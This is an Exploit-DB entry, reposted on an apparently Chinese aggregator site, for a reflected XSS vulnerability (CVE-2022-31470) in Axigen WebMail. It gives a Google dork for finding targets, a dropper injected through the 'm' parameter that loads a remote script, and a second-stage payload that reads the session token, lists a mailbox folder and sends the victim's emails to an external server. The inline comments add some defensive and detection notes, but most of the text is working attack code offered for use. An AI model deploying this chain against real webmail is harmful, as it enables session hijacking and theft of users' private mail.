Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

  • 作者: AmirZargham
    日期: 2023-09-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51722/
  • # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
    # Google Dork: inurl:passwordexpired=yes
    # Date: 2023-08-21
    # Exploit Author: AmirZargham
    # Vendor Homepage: https://www.axigen.com/
    # Software Link: https://www.axigen.com/mail-server/download/
    # Version: (10.5.0–4370c946) and older versions of Axigen WebMail
    # Tested on: firefox,chrome
    # CVE: CVE-2022-31470
    
    Exploit
    We use the second Reflected XSS to exploit this vulnerability, create a
    malicious link, and steal user emails.
    
    Dropper code
    This dropper code loads and executes JavaScript exploit code from a remote
    server.
    
    // First-stage "dropper" injected through the `m` query parameter (see the
    // encoded form below). The value is reflected, presumably inside a string
    // literal in the page's inline script, so the leading quote, paren and
    // semicolon close that context and the remainder runs as top-level script.
    ');
    // Creates a <script> whose src is an attacker-controlled origin; the actual
    // payload is fetched remotely, which keeps the reflected parameter short.
    x = document.createElement('script');
    x.src = 'https://example.com/exploit.js';
    // Appended once the DOM is ready so document.body exists. Defensive note: a
    // Content-Security-Policy `script-src` that excludes foreign origins, or
    // output-encoding `m` before reflection, stops this chain at this point.
    window.addEventListener('DOMContentLoaded',function y(){
    document.body.appendChild(x)
    })//
    // The trailing `//` comments out whatever the original line contained after
    // the injection point, so the page's script stays syntactically valid.
    
    
    
    Encoded form
    
    /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
    https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
    
    
    Exploit code
    
    // Second-stage payload, executed inside the webmail origin once the dropper
    // loads it. Three sequential XHRs: (1) GET `/` to recover the `_h` token from
    // the redirect URL, (2) PATCH one conversation to confirm a live session and
    // read a folderId, (3) list that folder and beacon the JSON, base64-encoded,
    // to the attacker's server as query parameters on a <script> src.
    // xhr1/2/3, oob_server, _h_cookie, resp, folderId and emails are implicit
    // globals; this is pasted page-context code, not a module.
    xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
    XMLHttpRequest();
    // Exfiltration endpoint. Data leaves as GET query strings on an external
    // script load, so proxy/DNS logs would show requests to an unfamiliar origin
    // carrying `status=`, `domain=` and a long base64 `emails=` parameter.
    oob_server = 'https://example.com/';
    var script_tag = document.createElement('script');
    
    xhr1.open('GET', '/', true);
    xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
    // responseURL is the URL after any redirect; the first `=`-delimited value
    // of its query string is taken as the `_h` token that the API URLs below
    // carry. Presumably this is a session-bound handle/anti-CSRF value — confirm
    // against the webmail login flow before relying on that reading.
    _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
    // PATCH on conversation `MQ` (base64 of "1", presumably the first
    // conversation). Server-side, this PATCH followed immediately by the folder
    // GET below, both from a session whose previous request was `index.hsp?m=`
    // with script in the parameter, is the trace a defender would look for.
    xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
    true);
    xhr2.setRequestHeader('Content-Type', 'application/json');
    xhr2.onreadystatechange = () => {
    if (xhr2.readyState === XMLHttpRequest.DONE) {
    // 401 means the victim has no live session; only that fact is beaconed.
    if (xhr2.status === 401){
    script_tag.src =
    `${oob_server}?status=session_expired&domain=${document.domain}`;
    document.body.appendChild(script_tag);
    } else {
    // Reads `mails[0].folderId` from the PATCH response (shape assumed by the
    // exploit author, not verified here).
    resp = xhr2.responseText;
    folderId = JSON.parse(resp)["mails"][0]["folderId"];
    xhr3.open('GET',
    `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
    xhr3.onreadystatechange = () => {
    if (xhr3.readyState === XMLHttpRequest.DONE) {
    // The raw folder listing is base64-encoded straight into the beacon URL;
    // the same <script> element is reused, so a second src assignment replaces
    // the earlier request.
    emails = xhr3.responseText;
    script_tag.src =
    `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
    document.body.appendChild(script_tag);
    }
    };
    xhr3.send();
    }
    }
    };
    // Side effect visible in the victim's mailbox: conversation `MQ` is marked
    // as read, a possible user-visible indicator that the chain ran.
    var body = JSON.stringify({isUnread: false});
    xhr2.send(body);
    }
    };
    xhr1.send();
    
    
    Combining dropper and exploit
    You can host the exploit code somewhere and then address it in the dropper
    code.